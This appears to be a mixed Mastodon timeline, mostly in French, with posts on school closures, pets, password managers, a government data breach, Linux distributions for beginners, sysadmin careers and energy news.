@nicosomb @DelphineM Chez moi, y a des pancartes sur deux écoles du primaire qui protestent contre les fermetures prévues pour la rentrée prochaine.
C'est donc un phénomène général, structurel. C'est un épiphénomène de la destruction du service public que mène ce gouv et le précédent et ceux d'avant. Tous ces serviteurs de l'intérêt personnel de leur poches et de leurs misérables carrières.
@nicosomb Surtout que on parle de classe moyenne, mais tous les enfants ne sont pas au même niveau, donc on va mettre quelques CP dans une classe de CE1 pour équilibrer (ou l'inverse) ? (Je ne sais pas quels niveaux sont dans cette école)
@C_Chell exactement ... on va avoir 33 grandes sections et 31 CM2 à la rentrée par exemple ...
@nicosomb @C_Chell Ca a l'air assez général. ce reportage est passé a 13h sur France2 https://www.franceinfo.fr/societe/education/a-breil-sur-roya-le-maire-et-ses-elus-font-leur-rentree-en-maternelle-doudou-a-la-main-pour-protester-contre-la-fermeture-d-une-classe_7967591.html
#les3bonheursdujour
- je crois qu'on va passer à la SPA cette semaine pour voir si ils ont un chat compatible avec notre bordel de vie
- se promener avec N2, la cocker, la vielle chihuahua et la chatte grise. Croiser une jeune demoiselle qui dit : "on dirait un Disney" 😁
- ne pas donner mon temps de vie au capitalisme cette semaine ✊
Mais, on la voit jamais, la vieille chihuahua !
@Azen elle est moche. Sourde. Quasi aveugle et caractérielle.
Elle vient en promenade si elle veut. Pendant la promenade, elle va où elle veut.
Et elle s'appelle Pouet (parole de scout).
ben écoute, tu prends de belles photos, parce que, certes, elle fait pas le poids face à la cocker, mais elle est pas moche du tout !
@Azen c'est une chihuahua !!! Une chihuahua !
C'est trop à assumer pour moi
Depuis que ma sœur a un croisé chihuahua-yorkshire qui illumine sa vie, j'ai une reconnaissance infinie pour ces petites bestioles que je regardais de haut avant.
@Azen je suis motard. J'ai une chihuahua. C'est plié.
Ma vie est foutue.
Je suis content pour ta soeur, mais moi j'ai perdu toute crédibilité mascu avec cet animal d'1.5 kg
@arthurr unE ChatonNE Tas JURÉ
@arthurr j'adore les contrastes. Alors un mec "virile" avec un chien de mémé, j'adore ! Tout comme les nana tiré à 4 epingle avec un gros chien degueu.
@selene_mwezi je croise parfois une "petite" dame toute menue avec un énorme dog complètement dingue. Je lis de la fatigue dans son regard quand même 😅
Friends,
I can tell you this happened:
Apr 26 10:20:39 skapet sshd-session[32158]: Failed password for invalid user root/1234567 from 94.227.227.108 port 40762 ssh2
#ssh #passwordgropers #passwordguessers #hailmarycloud #cybercrime
(yes, echoes of #hailmary https://nxdomain.no/~peter/hailmary_lessons_learned.html
reste que verino c'etait bien...mais pzut etre que la meilleure partie du week end est derriere moi...
profitez bien du votre !
je suis jaloux (et fier, mais surtout jaloux).
(je ne tag pas kauffmann car c'est juste pour me vanter)
bonne journée à tous et on touche pas à la prod 😉
@oldsysops oh ben tout pareil, dis. La grande ville, ça fait du bruit.
Et Vérino 💜 Déjà vu quatre fois (en presque 15 ans) et toujours beaucoup ri !
Profite bien !
@oldsysops bon weekend, mais si la prod est cassée on ne touche à rien ? C'est pour un ami 🤭
This would straight up freak me the absolute F out 😂
@oldsysops @ben Passbolt is the only Vaultwarden's alternative that I know.
It can be tricky to use for some (many?) users as you must configure your browser extension on each device with your gpg key.
This is why after using it in my IT department for a year (and it is great) we switch to Vaulwarden because we want to offer the service to others departments and Passbolt would be too "user complicated".
Or you can use a dedicated keepass file for sharing synced with your favorite tool (my family use Seafile to share things like keepass files).
La ministre des Armées était à l'hommage donné en l'honneur d'un homme qui a choisi de faire une carrière au sein de l'armée dans des unités amenées à intervenir sur des terrains de guerre.
Par contre, je n'ai relevé aucun déplacement de ministre pour le jeune de 15 ans, en seconde, au lycée donc, qui était contraint par l'Éducation Nationale de faire un stage en entreprise
Hello #Lille !
Tu connais l'Anamorphose ? Un local autogéré qui permet à plein de collectifs de faire leurs réunions et à plein d'évènements ponctuels ou réguliers de se tenir ?
https://anamorphose.noblogs.org/
C'est un peu la galère pour payer le loyer pour les prochains mois, leurs revenus sont générés principalement par la bière qu'iels brassent sur place et par du catering pour des évènements.
N'hésitez pas à les solliciter pour des caterings (c'est généralement vegan, super accessible par rapport à un traiteur et vraiment bon) mais aussi à leur donner un coup de main pour ceux-ci, à acheter leur bière artisanale, locale et bio (4€50 la bouteille, 50€ la caisse de 12), à aller manger sur place à prix libre de temps en temps ou a leur proposer de faire un truc en soutien !
@Ortie je sais pas si ça peut aider mais l'anamorphose est maintenant ajouté sur openstreetmap, histoire d'être plus accessible pour les gens n'utilisant pas google maps.
Given the situation in the US I'm now living in Canada, and I'm looking for a new job as my current one is obviously American. If you are or know a Canadian employer with use for a person in Toronto with a good understanding of SQL databases, Linux administration (mostly Debian but I can do Fedora), HTML-based Web backends, ServiceNow, and Microsoft cloud offerings, plus some networking experience (office networks and outbound-filtering firewalls), technical writing skills, and significant programming experience with Rust, Python, C#, and PowerShell, please get in touch via email or DMs.
@alilly eep. Hubby is an sql dev and he’s hitting the “we want AI, we want cloud” self-sabotage when it comes to employers. In a few years employers will be competing for your services. Right now, there are jobs. Just not as many as there should be. Good luck.
⋅ L'ANTS piratée à cause d'une faille basique et 19 millions de Français en font les frais, une fois de plus !
🤦♂️
@Steve12L
Oh mais merde, hein.
"Il suffisait de modifier un identifiant dans une requête pour consulter les données d'un autre citoyen."
PURIN, SÉRIEUSEMENT !??? 🤬
@sebsauvage L'état ce gruyère, c'en est presque trop facile.
Affligeant !
@Steve12L @sebsauvage Z’imaginez si le S c’était pour Sécurisés ?
Ah merde, attendez…
@breizh Si seulement… Les sites du gouvernement, ce n'est même plus du gruyère, un gamin de 14 ans pourrait les hacker.
C'est même plus drôle à force.
Et tout vers le numérique hein !
Bouffons. @sebsauvage
Et l'état veux ficher de plus en plus de choses...
"Pancreatic cancer mRNA vaccine shows lasting results in an early trial: Scientists caution that more research is needed, but nearly all of the patients who responded to the personalized vaccine are still alive six years later."
Just wow. Wow.
C'est quoi l'état de l'art en termes de Linux pour « personnes normales » ?
Ubuntu (une variante) ? ZorinOS ? Mint ?
Ce que je cherche :
- Une mise à jour graphique facile à faire ;
- Un environnement graphique « classique » avec des icones sur un bureau et un menu de barre en bas ;
- Quelque chose qui soit léger et rapide (pour des lenovos x270)
@RGrunblatt on a mis des debian facile à la dernière install party j'ai trouvé ça très bien, simple et léger !
@oldsysops @flesueur @RGrunblatt Je connaissais pas non plus. J'ai l'impression que c'est ça : https://debian-facile.org/projets:iso-debian-facile
@oldsysops @RGrunblatt par là : https://debian-facile.org/projets:iso-debian-facile . C'est pas moi qui ai préparé les clés mais j'en ai installé quelques unes, et celui qui avait géré en a installé plein plein il adore et m'a convaincu. Même le support matériel est très bon de base.
j’hésite, d’un côté c’est quand même mon ordi pro, mais d’un autre côté justement c’est mon ordi pro
@oldsysops quels seraient les stickers que tu ramènes en juin ?
Les entreprises qui valorisent le mec qui règle les crises à toute heure, mais ignorent celui qui avait documenté, automatisé, anticipé 🙄 elles recrutent en fait leur prochain incident... La culture de l'urgence permanente, ça se construit brique par brique 🧱
Polling Mastodon: should social media platforms suspend the accounts of governments and officials who shut down or censor the internet?
| Yes. Suspend them: | 79 |
| No. Let them speak: | 30 |
| It’s complicated: | 91 |
@netblocks how do you suspend an account if they manage their instance?
@robux4 For context, we ran this poll for the first time in 2019 on Twitter and have aimed to keep the wording similar ('companies' is replaced with 'platforms' on here as non-profits and volunteers are involved). Your observation that the same semantics don't necessarily apply to a decentralized platform is a good one!
@netblocks can we make them read the protest replies before they can post more?
@alienghic @netblocks When I was in university in iran, I had to pass a mandatory class called “Islamic thinking”. At one point he claimed that we respect people’s choices. I pointed out that the punishment for someone rejecting islam after they were born into it is death.
He said no. It’s only if the person advertises it.
So I asked:
⁃ If you know someone is an atheist, but not advertising it… (1/3)
@vigdis Aussi catégorique qu'une IA trop sûre d'elle... 
@manu comment ça? Je me demande si on a lu la même chose?
@vigdis Ben il est catégorique : c'est juste du marketing. Il prétend même que pouvoir faire crasher OpenBSD n'est pas véritablement une faille...
C'est à quel moment qu'on doit réagir?
@oldsysops @vigdis Ce que j'ai du mal à comprendre, c'est pourquoi on affirme que ce n'est que du marketing et que des discours commerciaux, alors que le modèle n'est même pas à vendre !? À ce que je sache, il est même "donné" aux géants du dev pour qu'ils corrigent les vulnérabilités découvertes au plus vite. #Glasswing
Trouvé sur Insta, compte Le Griffoir de Noam qui n’a pas de compte sur une plateforme non privative d’après ce que j’ai pu voir
#politique #bd #poutou
1/18
2/18 (ça va me prendre la journée avec la rédaction de tous les alt 🙄)
3/18 (avec la dictée vocale ça va assez vite finalement)
4/18
5/18
6/18
7/18
8/18 (je me suis plantée dans la numérotation, j’ai DL des images en double)
Bref page suivante
9/18 (ou 17 on verra à la fin)
10/18 (yes ! J’ai dépassé la moitié)
11/18
12/18
13/18 (ou 17 on verra à la fin)
14/18
15/18
16/18
17/18
Épilogue (donc y’avait que 17 planches)
@laetsgo ce boulot sur les alt 🙇
J’espère que ça vous a plu
Moi, ça m’a bien fait pouffer de rire donc je voulais vous en faire profiter
Bon dimanche 😇
2 bis (la planche que j’avais ratée et qui permet d’aller à 18
Et j’en ai oublié 2 autres qui sont juste avant la 8/18 dans le thread initial
(C’est juste pour rajouter du contexte, rien à voir avec le fait que j’ai merdouillé sur les téléchargements 😇)
On va dire que ce sont des bonus
Yo, les gens qui font de l'administration système*, vous êtes passés par quel parcours avant de toucher à ça ?
Études, les postes/métiers que vous avez fait avant, ce que vous faites maintenant…
Réflexion sur mon orientation, j'ai besoin de connaître un peu les différentes expériences…
*et apparentés**
(**mettez-y ce que vous voulez)
#AdminSys #AdministrationSystème #orientation #études #mastoFac #informatique
je pense que l'envie et la curiosité sont les meilleurs qualité pour progresser et se voir confier de plus en plus de taches de haut niveau.
après, autre temps,autre moeurs... peut etre que l'age d'or du metier d'adminsys est passé (ou pas)
bon courage à toi.
@Aznorth alors je pense que mon parcours est complètement étrange...
études : ENS, DEA et début de thèse en informatique théorique
Puis parti dans une équipe de l'INRIA à faire du développement embarqué (y'avait du CAML sur la partie outils sur PC...)
Ensuite le chef de l'équipe a monté sa boite, développement embarqué encore, au bout de 7/8 ans je me suis réorienté vers l'IT, puis petit à petit passé à l'admin réseau.
Et maintenant je suis vraiment admin réseau.
Best Strait of Hormuz strategy now is to transition to wind and solar and mass transit
I meet countless people through work and I lose track of who's nice and not so I developed a system. Anyone that's the latter has their last name saved in capitals on my email contacts. So when James JONES emails me I am reminded that he's a knob and can respond accordingly.
Une chose qui m'aide à me sentir ok quand l'actualité est morose : donner mon sang.
C'est un geste altruiste qui aide concrètement, on y croise des personnes qui se soucient des autres (le personnel et les donneurs) et ça ne prend qu'une heure. Ah et je peux m'en vanter sur les réseaux sociaux 😉.
Si vous pouvez donner votre sang, votre plasma ou vos plaquettes, prenez un rendez-vous.
Et si vous pensez ne pas pouvoir donner, vérifiez. Certaines restrictions ont évolué ces dernières années.
C'est ENFIN le retour des meetups Django Paris! 🐍
Date: le 16 avril
Programme:
- Nous voulons toujours des chevaux plus rapides, Darko Stankozski
- Vous n'étiez pas prêts pour les Design Systems, Matthias Dugué Cercy
La communication et les talks seront en français. Zenika Paris nous héberge pour l'occasion 💚
Infos et inscriptions sur meetup.com :
https://meetu.ps/e/PXQsy/w4Stv/i
Personnellement je n'ai pas cherché d'usage (j'ai essayé de lui faire écrire une PSSI un soir de désespoir... ca n'a pas été concluant)
“How India is charting a new path into the electric age”
“Solar module production has grown twelvefold to 120 GW, more than enough for self-sufficiency. Cell manufacturing, virtually absent a decade ago, has reached 18 GW. Battery and EV manufacturing are not far behind.”
https://www.weforum.org/stories/2026/03/how-india-is-charting-a-new-path-into-the-electric-age/
#India #Solar #Batteries #EV #Renewables #Electricity #Energy #Climate #Industry
truc bizarre une fois corrigé on a eu un autre dysfonctionnement, que je n'ai pas su résoudre...
faute de solution, on a fini par changer la version de PHP et ca a du changer de serveur et c'est retomber en marche....
j'étais à 2 doigts de lui proposée de l'héberger sur mon serveur (très mauvaise idée)
je ne pensais pas etre accro a ce point...
nearly thirty years ago i saw a guy stand up in an all hands staff meeting, declare "this is stupid", walk out and never come back, and friends, there's not a single day of 2026 I haven't thought of him
mais en vrai, le backup distant c'est deja tres bien.
sache que j'ai bien rigoler silencieusement derrière mon écran de la facon dont tu essayais de cacher ce mail 😉
Historique